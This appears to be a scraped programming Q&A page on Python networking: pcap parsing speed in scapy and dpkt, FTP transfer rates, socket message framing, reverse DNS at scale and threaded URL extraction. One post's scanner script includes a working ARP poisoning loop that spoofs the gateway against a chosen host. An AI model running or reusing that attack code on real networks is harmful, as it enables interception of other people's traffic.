I am comparing scapy and dpkt in terms of speed. I have a directory of pcap files which I parse, counting the HTTP requests in each file. Here's the scapy code:
import os
import time
from scapy.all import *

def parse(f):
    x = 0
    pcap = rdpcap(f)
    for p in pcap:
        try:
            if p.haslayer(TCP) and p.getlayer(TCP).dport == 80 and p.haslayer(Raw):
                x = x + 1
        except:
            continue
    print x

if __name__ == '__main__':
    path = '/home/pcaps'
    start = time.time()
    for file in os.listdir(path):
        current = os.path.join(path, file)
        print current
        f = open(current)
        parse(f)
        f.close()
    end = time.time()
    print (end - start)
The script is really slow (it gets stuck after a few minutes) compared to the dpkt version:
import dpkt
import time
from os import walk
import os
import sys

def parse(f):
    x = 0
    try:
        pcap = dpkt.pcap.Reader(f)
    except:
        print "Invalid Header"
        return
    for ts, buf in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
        except:
            continue
        if eth.type != 2048:
            continue
        try:
            ip = eth.data
        except:
            continue
        if ip.p == 6:
            if type(eth.data) == dpkt.ip.IP:
                tcp = ip.data
                if tcp.dport == 80:
                    try:
                        http = dpkt.http.Request(tcp.data)
                        x = x + 1
                    except:
                        continue
    print x

if __name__ == '__main__':
    path = '/home/pcaps'
    start = time.time()
    for file in os.listdir(path):
        current = os.path.join(path, file)
        print current
        f = open(current)
        parse(f)
        f.close()
    end = time.time()
    print (end - start)
So is there something wrong with the way I am using scapy? Or is it just that scapy is slower than dpkt?
You inspired me to compare. 2 GB PCAP. Dumb test. Simply counting the number of packets.
I'd expect this to be in single-digit minutes with C++/libpcap, just based on previous timings of similarly sized files. But this is something new. I wanted to prototype first. My velocity is generally higher in Python.
For my application, streaming is the only option. I'll be reading several of these PCAPs simultaneously and doing computations based on their contents. Can't just hold in memory. So I'm only comparing streaming calls.
scapy 2.4.5:
from scapy.all import *
import datetime

i = 0
print(datetime.datetime.now())
for packet in PcapReader("/my.pcap"):
    i += 1
else:
    print(i)
print(datetime.datetime.now())
dpkt 1.9.7.2:
import datetime
import dpkt

pcap_file = "/my.pcap"  # same capture file as the scapy test
print(datetime.datetime.now())
with open(pcap_file, 'rb') as f:
    pcap = dpkt.pcap.Reader(f)
    i = 0
    for timestamp, buf in pcap:
        i += 1
    else:
        print(i)
print(datetime.datetime.now())
Results:
Packet count is the same. So that's good. :-)
dpkt - just under 10 minutes.
scapy - 35 minutes.
dpkt went first, so if the disk cache were helping either package, it would be scapy. And I think it might be, marginally: I did this previously with scapy only, and it was over 40 minutes.
In summary, thanks for your five-year-old question. It's still relevant today. I almost bailed on Python here because of the slow read speeds from scapy. dpkt seems substantially more performant.
Side note, alternative packages:
https://pypi.org/project/python-libpcap/ I'm on Python 3.10 and 0.4.0 seems broken for me, unfortunately.
https://pypi.org/project/libpcap/ I'd like to compare timings to this, but have found it much harder to get a minimal example going. Haven't spent much time though, to be fair.
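Going back to the original question: rdpcap() loads the entire capture into memory before you ever iterate, which by itself can make big files look stuck. A minimal sketch of the same per-file HTTP-request count using the streaming PcapReader instead (same filter logic as the question; untested against your captures):

from scapy.all import PcapReader, TCP, Raw

def count_http_requests(path):
    # Stream packets one at a time instead of loading the whole file.
    x = 0
    for p in PcapReader(path):
        if p.haslayer(TCP) and p[TCP].dport == 80 and p.haslayer(Raw):
            x += 1
    return x

It still pays scapy's per-packet dissection cost, so dpkt will likely stay faster, but at least memory usage stays flat.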
Related
I want to know how much data has been downloaded in the last second.
I don't have any code yet, but I was wondering when I should start counting this one second and how to do it.
Should I start counting before retrbinary() or after? Or am I totally wrong?
First, there are ready-made implementations for transfer progress display, including the transfer speed.
For example, the progressbar2 module. See Show FTP download progress in Python (ProgressBar).
By default, progressbar2 displays the FileTransferSpeed widget, which shows the average transfer speed since the download started.
Note, though, that speed displays usually do not show that kind of value; they show an average speed over the last few seconds, which makes the value more informative. progressbar2 has the AdaptiveTransferSpeed widget for that, but it seems to be broken.
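For illustration, a rough sketch of that ready-made route (assuming the progressbar2 package, a server that supports the SIZE command, and the same hypothetical host/user/passwd and /file.dat as the code below):

from ftplib import FTP
import progressbar

ftp = FTP(host, user, passwd)          # same hypothetical credentials as below
ftp.voidcmd('TYPE I')                  # binary mode, so the SIZE command is allowed
total = ftp.size('/file.dat')

widgets = ['Downloading: ', progressbar.Percentage(), ' ',
           progressbar.Bar(), ' ', progressbar.FileTransferSpeed()]
bar = progressbar.ProgressBar(max_value=total, widgets=widgets).start()
transferred = 0

def write(data):
    global transferred
    f.write(data)
    transferred += len(data)
    bar.update(transferred)            # progressbar2 renders the speed widget

f = open('file.dat', 'wb')
ftp.retrbinary('RETR /file.dat', write)
f.close()
bar.finish()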
If you want to implement the calculation on your own, and are happy with the simple average transfer speed since the download started, it is easy:
from ftplib import FTP
import time
import sys
import datetime

ftp = FTP(host, user, passwd)

print("Downloading")

total_length = 0
start_time = datetime.datetime.now()

def write(data):
    f.write(data)
    global total_length
    global start_time
    total_length += len(data)  # number of bytes received in this block
    elapsed = (datetime.datetime.now() - start_time)
    speed = (total_length / elapsed.total_seconds())
    print("\rElapsed: {0} Speed: {1:.2f} kB/s".format(str(elapsed), speed / 1024), end="")

f = open('file.dat', 'wb')
ftp.retrbinary("RETR /file.dat", write)
f.close()

print()
print("done")
It is way more difficult to calculate the average speed over the last few seconds. You have to remember the amount of data transferred at past moments. Stealing (and fixing) the code from AdaptiveTransferSpeed, you will get something like:
sample_times = []
sample_values = []
INTERVAL = datetime.timedelta(milliseconds=100)
last_update_time = None
samples = datetime.timedelta(seconds=2)
total_length = 0

def write(data):
    f.write(data)
    global total_length
    total_length += len(data)
    elapsed = (datetime.datetime.now() - start_time)

    if sample_times:
        sample_time = sample_times[-1]
    else:
        sample_time = datetime.datetime.min

    t = datetime.datetime.now()
    if t - sample_time > INTERVAL:
        # Add a sample, but keep only the history within the `samples` window
        sample_times.append(t)
        sample_values.append(total_length)

        minimum_time = t - samples
        minimum_value = sample_values[-1]
        while (sample_times[2:] and
               minimum_time > sample_times[1] and
               minimum_value > sample_values[1]):
            sample_times.pop(0)
            sample_values.pop(0)

    delta_time = sample_times[-1] - sample_times[0]
    delta_value = sample_values[-1] - sample_values[0]
    if delta_time:
        speed = (delta_value / delta_time.total_seconds())
        print("\rElapsed: {0} Speed: {1:.2f} kB/s".format(
            str(elapsed), speed / 1024), end="")

ftp.retrbinary("RETR /medium.dat", write)
Client side:
def send_file_to_hashed(data, tcpsock):
    time.sleep(1)
    f = data
    flag = 0
    i = 0
    tcpsock.send(hashlib.sha256(f.read()).hexdigest())
    f.seek(0)
    time.sleep(1)
    l = f.read(BUFFER_SIZE - 64)
    while True:
        while (l):
            tcpsock.send(hashlib.sha256(l).hexdigest() + l)
            time.sleep(1)
            hashok = tcpsock.recv(6)
            if hashok == "HASHOK":
                l = f.read(BUFFER_SIZE - 64)
                flag = 1
            if hashok == "BROKEN":
                flag = 0
        if not l:
            time.sleep(1)
            tcpsock.send("DONE")
            break
    return (tcpsock, flag)

def upload(filename):
    flag = 0
    while(flag == 0):
        with open(os.getcwd() + '\\data\\' + filename + '.csv', 'rU') as UL:
            tuplol = send_file_to_hashed(UL, send_to_sock(filename + ".csv", send_to("upload", TCP_IP, TCP_PORT)))
            (sock, flagn) = tuplol
            flag = flagn
            time.sleep(2)
            sock.close()
Server Side:
elif(message == "upload"):
    message = rec_OK(self.sock)
    fis = os.getcwd() + '/data/' + time.strftime("%H:%M_%d_%m_%Y") + "_" + message
    f = open(fis, 'w')
    latest = open(os.getcwd() + '/data/' + message, 'w')
    time.sleep(1)
    filehash = rec_OK(self.sock)
    print("filehash:" + filehash)
    while True:
        time.sleep(1)
        rawdata = self.sock.recv(BUFFER_SIZE)
        log.write("rawdata :" + rawdata + "\n")
        data = rawdata[64:]
        dhash = rawdata[:64]
        log.write("chash: " + dhash + "\n")
        log.write("shash: " + hashlib.sha256(data).hexdigest() + "\n")
        if dhash == hashlib.sha256(data).hexdigest():
            f.write(data)
            latest.write(data)
            self.sock.send("HASHOK")
            log.write("HASHOK\n")
            print "HASHOK"
        else:
            self.sock.send("HASHNO")
            print "HASHNO"
            log.write("HASHNO\n")
        if rawdata == "DONE":
            f.close()
            f = open(fis, 'r')
            if (hashlib.sha256(f.read()).hexdigest() == filehash):
                print "ULDONE"
                log.write("ULDONE")
                f.close()
                latest.close()
                break
            else:
                self.sock.send("BROKEN")
                print hashlib.sha256(f.read()).hexdigest()
                log.write("BROKEN")
                print filehash
                print "BROKEN UL"
                f.close()
The data upload works fine in all the tests I ran from my computer, and it even worked while uploading data over my mobile connection. Still, people sometimes say it takes so long that they kill it after a few minutes; the data is there on their computers but not on the server. I don't know what is happening, please help!
First of all: this is unrelated to SHA.
Streaming over the network is unpredictable. This line
rawdata = self.sock.recv(BUFFER_SIZE)
doesn't guarantee that you read BUFFER_SIZE bytes; in the worst case you may read only 1 byte. Your server side is therefore completely broken, because it assumes that rawdata contains a whole message. It is even worse: if the client sends the command and the hash quickly, you may get e.g. rawdata == 'DONEa2daf78c44(...)', which is a mix of the two.
The "hanging" part just follows from that. Trace your code and see what happens when the server receives partial/broken messages (I already did that in my imagination :P).
Streaming over the network is almost never as easy as calling sock.send on one side and sock.recv on the other side. You need some buffering/framing protocol. For example, you can implement this simple protocol: always interpret the first two bytes as the size of the incoming message, like this:
client (pseudocode)
# convert len of msg into a two-byte array
# I am assuming the max size of msg is 65535
buf = bytearray([len(msg) & 255, len(msg) >> 8])
sock.sendall(buf)
sock.sendall(msg)
server (pseudocode)
size = to_int(sock.recv(1))
size += to_int(sock.recv(1)) << 8
# You need two calls to recv since recv(2) can return 1 byte.
# (well, you can try recv(2) with `if` here to avoid additional
# syscall, not sure if worth it)
buffer = bytearray()
while size > 0:
    tmp = sock.recv(size)
    buffer += tmp
    size -= len(tmp)
Now you have the properly read data in the buffer variable, which you can work with.
WARNING: the pseudocode for the server is simplified. For example, you need to check for an empty recv() result everywhere (including where size is calculated); that is what you get when the client disconnects.
So unfortunately there's a lot of work in front of you. You have to rewrite the whole sending and receiving code.
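As a starting point, here is a hedged sketch of such a framing layer in Python, using a 2-byte little-endian length prefix to match the pseudocode above (the helper names send_msg, recv_msg and recv_exactly are my own):

import struct

def send_msg(sock, msg):
    # Prefix every message with its length (2 bytes, little-endian, max 65535).
    sock.sendall(struct.pack('<H', len(msg)))
    sock.sendall(msg)

def recv_exactly(sock, size):
    # Keep calling recv() until exactly `size` bytes have arrived.
    buf = bytearray()
    while len(buf) < size:
        chunk = sock.recv(size - len(buf))
        if not chunk:                       # peer disconnected mid-message
            raise RuntimeError("socket closed mid-message")
        buf += chunk
    return bytes(buf)

def recv_msg(sock):
    size, = struct.unpack('<H', recv_exactly(sock, 2))
    return recv_exactly(sock, size)

With helpers like these, the client sends each chunk as send_msg(sock, hash + chunk) and the server reads it back with recv_msg(sock), so a DONE marker can never get glued onto a data message.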
I'm trying to build an ARP scanner script with Scapy. Every time I perform a scan, I don't get the expected result: I only get two responses, one from the gateway and one from my host machine (I'm performing the scan from a Kali virtual machine). Sometimes I get only one more response, that's all. But when I do ARP discovery with another tool (like Nmap), I get all the expected responses (from eight machines). What's wrong in my code, guys? Can you help me? :-(
from scapy.all import *
import sys
from datetime import datetime

def Out():
    print "\nBye!"
    sys.exit(1)

try:
    os.system('clear')
    interface = raw_input("Enter interface : ")
    ips = raw_input("Enter network address : ")
    collection = []
    print "Scanning..."
    start_time = datetime.now()
    conf.verb = 0
    ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF")/ARP(pdst=ips), iface=interface, timeout=2, inter=0.5)  # ARP scanner starts here
    n = 0
    for snd, rcv in ans:
        result = rcv.sprintf(r"%Ether.src% : %ARP.psrc%")
        collection.append(result)  # append to collection
        print n, "-", collection[n]
        n = n + 1
    stop_time = datetime.now()
    print "\nScan done in ", stop_time - start_time, " seconds."
    if n > 0:
        target = raw_input("\nPlease enter host to arp poison : ")
        gw_addr = raw_input("Enter the gateway address : ")
        print "\nArp poison on host", target, "starting...\nHit Ctrl + C to Stop.\n"
        p = ARP(pdst=target, psrc=gw_addr)  # ARP poison attack starts here
        send(p, inter=RandNum(10, 40), loop=1)
    else:
        Out()
except KeyboardInterrupt:
    Out()
Try to make the tool run infinitely and use this code to re-print the results:
import sys
print "\rthe result",
sys.stdout.flush()
I think the first run only gave you the traffic present at that moment; an infinite loop will keep monitoring all the results.
I hope you figure it out ;)
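A rough sketch of that suggestion, wrapping the same srp() call from the question in an endless loop and re-printing the latest results on one line (the interface and network below are placeholders):

from scapy.all import srp, Ether, ARP, conf
import sys
import time

conf.verb = 0
interface = "eth0"            # placeholder, use your own interface
ips = "192.168.1.0/24"        # placeholder network address

while True:                   # keep scanning forever
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ips),
                     iface=interface, timeout=2)
    results = [rcv.sprintf(r"%Ether.src% : %ARP.psrc%") for snd, rcv in ans]
    sys.stdout.write("\r" + str(len(results)) + " hosts: " + ", ".join(results))
    sys.stdout.flush()        # overwrite the previous line instead of scrolling
    time.sleep(5)             # pause between scans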
I am planning to run reverse DNS on 47 million IPs. Here is my code:
with open(file, 'r') as f:
    with open('./ip_ptr_new.txt', 'a') as w:
        for l in f:
            la = l.rstrip('\n')
            ip, countdomain = la.split('|')
            ips.append(ip)
            try:
                ais = socket.gethostbyaddr(ip)
                print("%s|%s|%s" % (ip, ais[0], countdomain), file=w)
            except:
                print("%s|%s|%s" % (ip, "None", countdomain), file=w)
Currently it is very slow. Does anybody have any suggestions for speeding it up?
Try using the multiprocessing module. I timed the performance for about 8000 IPs and I got this:
#dns.py
real 0m2.864s
user 0m0.788s
sys 0m1.216s
#slowdns.py
real 0m17.841s
user 0m0.712s
sys 0m0.772s
# dns.py
from multiprocessing import Pool
import socket

def dns_lookup(ip):
    ip, countdomain = ip
    try:
        ais = socket.gethostbyaddr(ip)
        print("%s|%s|%s" % (ip, ais[0], countdomain))
    except:
        print("%s|%s|%s" % (ip, "None", countdomain))

if __name__ == '__main__':
    filename = "input.txt"
    ips = []
    with open(filename, 'r') as f:
        with open('./ip_ptr_new.txt', 'a') as w:
            for l in f:
                la = l.rstrip('\n')
                ip, countdomain = la.split('|')
                ips.append((ip, countdomain))
    p = Pool(5)
    p.map(dns_lookup, ips)
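Note that the dns.py workers print to stdout instead of writing to ip_ptr_new.txt. A small variation (my own sketch, not part of the original answer) returns the formatted line from each worker and lets the parent process write the file:

# dns_tofile.py - hypothetical variant of dns.py that keeps the file output
from multiprocessing import Pool
import socket

def dns_lookup(item):
    ip, countdomain = item
    try:
        ais = socket.gethostbyaddr(ip)
        return "%s|%s|%s" % (ip, ais[0], countdomain)
    except Exception:
        return "%s|%s|%s" % (ip, "None", countdomain)

if __name__ == '__main__':
    ips = []
    with open("input.txt") as f:
        for l in f:
            ip, countdomain = l.rstrip('\n').split('|')
            ips.append((ip, countdomain))
    # The workers only resolve; the parent writes the results in order.
    with open('./ip_ptr_new.txt', 'a') as w:
        for line in Pool(5).map(dns_lookup, ips):
            w.write(line + '\n')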
# slowdns.py
import socket
from multiprocessing import Pool

filename = "input.txt"
if __name__ == '__main__':
    ips = []
    with open(filename, 'r') as f:
        with open('./ip_ptr_new.txt', 'a') as w:
            for l in f:
                la = l.rstrip('\n')
                ip, countdomain = la.split('|')
                ips.append(ip)
                try:
                    ais = socket.gethostbyaddr(ip)
                    print("%s|%s|%s" % (ip, ais[0], countdomain), file=w)
                except:
                    print("%s|%s|%s" % (ip, "None", countdomain), file=w)
One solution here is to use the nslookup shell command with a timeout, or possibly the host command.
An example, not perfect but useful:
import subprocess

def sh_dns(ip, dns):
    a = subprocess.Popen(['timeout', '0.2', 'nslookup', '-norec', ip, dns], stdout=subprocess.PIPE)
    sortie = a.stdout.read()
    tab = str(sortie).split('=')
    if len(tab) > 1:
        return tab[len(tab) - 1].strip(' \\n\'')
    else:
        return ""
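A quick usage sketch that feeds it from a worker pool, as in the answer above (the file names and the 8.8.8.8 resolver are placeholders; it assumes sh_dns is defined in the same module):

from multiprocessing import Pool

def lookup(ip):
    # Fall back to "None" when the lookup times out or returns nothing.
    return "%s|%s" % (ip, sh_dns(ip, "8.8.8.8") or "None")

if __name__ == '__main__':
    with open("input_ips.txt") as f:
        ips = [line.strip() for line in f if line.strip()]
    with open("ptr_results.txt", "w") as w:
        for line in Pool(10).map(lookup, ips):
            w.write(line + "\n")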
We recently had to deal with this problem too.
Running on multiple processes didn't provide a good enough solution; it could take several days to process a few million IPs on a powerful AWS machine.
What worked well was Amazon EMR; it took around half an hour on a 10-machine cluster.
You cannot scale very far with one machine (and usually one network interface), as this is a network-intensive task. Using MapReduce across multiple machines certainly did the job.
I need to extract all the URLs from an IP list.
I wrote this Python script, but I have an issue: the same IP is extracted multiple times (more threads are created with the same IP).
Could anyone improve on my solution using multithreading?
Sorry for my English.
Thanks all
import urllib2, os, re, sys, time, httplib, thread, argparse, random

try:
    ListaIP = open(sys.argv[1], "r").readlines()
except(IOError):
    print "Error: Check your IP list path\n"
    sys.exit(1)

def getIP():
    if len(ListaIP) != 0:
        value = random.sample(ListaIP, 1)
        ListaIP.remove(value[0])
        return value
    else:
        print "\nListaIPs sa terminat\n"  # Romanian: "the IP list is finished"
        sys.exit(1)

def extractURL(ip):
    print ip + '\n'
    page = urllib2.urlopen('http://sameip.org/ip/' + ip)
    html = page.read()
    links = re.findall(r'href=[\'"]?([^\'" >]+)', html)
    outfile = open('2.log', 'a')
    outfile.write("\n".join(links))
    outfile.close()

def start():
    while True:
        if len(ListaIP) != 0:
            test = getIP()
            IP = ''.join(test).replace('\n', '')
            extractURL(IP)
        else:
            break

for x in range(0, 10):
    thread.start_new_thread(start, ())

while 1:
    pass
Use a threading.Lock. The lock should be global, and created at the beginning, when you create the IP list.
Call lock.acquire() at the start of getIP() and release it before you leave the method.
What you are seeing is: thread 1 executes value = random.sample(...), and then thread 2 also executes value = random.sample(...) before thread 1 gets to the remove. So the item is still in the list at the time thread 2 gets there.
Therefore both threads have a chance of getting the same IP.
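A minimal sketch of that change applied to the getIP() from the question (the lock name list_lock is my own; the with block acquires and releases exactly as described):

import threading
import random
import sys

list_lock = threading.Lock()          # global, created alongside ListaIP

def getIP():
    with list_lock:                   # acquire at the start, release on return
        if len(ListaIP) != 0:
            value = random.sample(ListaIP, 1)
            ListaIP.remove(value[0])
            return value
        else:
            print "\nThe IP list is finished\n"
            sys.exit(1)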